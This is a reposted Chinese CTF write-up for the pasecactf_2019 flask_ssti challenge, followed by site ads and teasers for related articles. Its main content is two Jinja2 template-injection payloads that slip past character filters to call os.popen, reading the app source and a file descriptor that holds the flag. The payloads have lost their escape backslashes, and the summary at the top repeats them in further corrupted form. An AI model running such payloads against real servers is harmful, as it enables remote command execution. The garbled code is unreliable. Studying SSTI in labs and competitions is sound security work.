web | [pasecactf_2019]flask_ssti

摘要:
明显的ssti过滤单引号、点和下划线直接抛出exp读取源代码{{()[“x5fx5fclassx5fx5f”][“x5fx5fmrox5fx5f”][1][“x5FX 5fsubclasssx5fx5F”]()[127][“X5fx5finitex5fx5f”][”x5fx5fglobals x5fx5f-“][”popen“](“cat%20appx2epy”)[”read“]()}读取标志{(()[

明显的ssti

过滤单引号,点,下划线

直接丢exp了

读源码

{{()["x5fx5fclassx5fx5f"]["x5fx5fmrox5fx5f"][1]["x5fx5fsubclassesx5fx5f"]()[127]["x5fx5finitx5fx5f"]["x5fx5fglobalsx5fx5f"]["popen"]("cat%20appx2epy")["read"]()}}

读flag

{{()["x5fx5fclassx5fx5f"]["x5fx5fmrox5fx5f"][1]["x5fx5fsubclassesx5fx5f"]()[127]["x5fx5finitx5fx5f"]["x5fx5fglobalsx5fx5f"]["popen"]("cat%20/proc/self/fd/3")["read"]()}}

我感觉上面的应该就可以了,不过就是读不出来东西,可能有点细微的差别,用另外一个get_data就可以成功了。

免责声明:文章转载自《web | [pasecactf_2019]flask_ssti》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇百度地图API初体验和偏移纠正方法JS字符串拼接优化下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

linux中给数据加上行号

1、测试数据 [root@PC3 test]# cat b.txt e t 3 d g 2 k 8 p m 9 p 5 7 8 m i o e t d 2、awk加行号 [root@PC3 test]# awk '{print NR,$p}' b.txt 1 e t 3 2 d g 2 3 k 8 p 4 m 9 p 5 5 7 8 6 m i o 7 e...

Java poi读取,写入Excel,处理row和cell可能为空的情况

首先需要导入包 import org.apache.poi.hssf.usermodel.HSSFWorkbook; import org.apache.poi.poifs.filesystem.NPOIFSFileSystem; import org.apache.poi.ss.usermodel.Row; import org.apache.poi.s...

史上最全Linux提权后获取敏感信息方法

在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节. 文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是...

SHELL脚本编程循环篇-while循环

              SHELL脚本编程循环篇-while循环                                           作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任。 一.while循环的语法格式 while CONDITION; do   循环体 done 以上参数关键点说明:   C...

Linux中往文件中的某行插入数据 以及 行列转化的做法(paste、xargs等)

sed -i 'nix' test.file        表示向test.file文件里的第n行的前面添加x内容sed -i 'nax' test.file       表示向test.file文件里的第n行的后面添加x内容 sed -i '/m/ix' test.file     表示向test.file文件里匹配m字符串的行的前面添加x内容sed -...

CentOS查看系统信息-CentOS查看命令

一:查看cpu more /proc/cpuinfo | grep "model name"   grep "model name" /proc/cpuinfo  如果觉得需要看的更加舒服 grep "model name" /proc/cpuinfo | cut -f2 -d:  怎么样,linux的命令就要这样熟悉。 二:查看内 [root@Ce...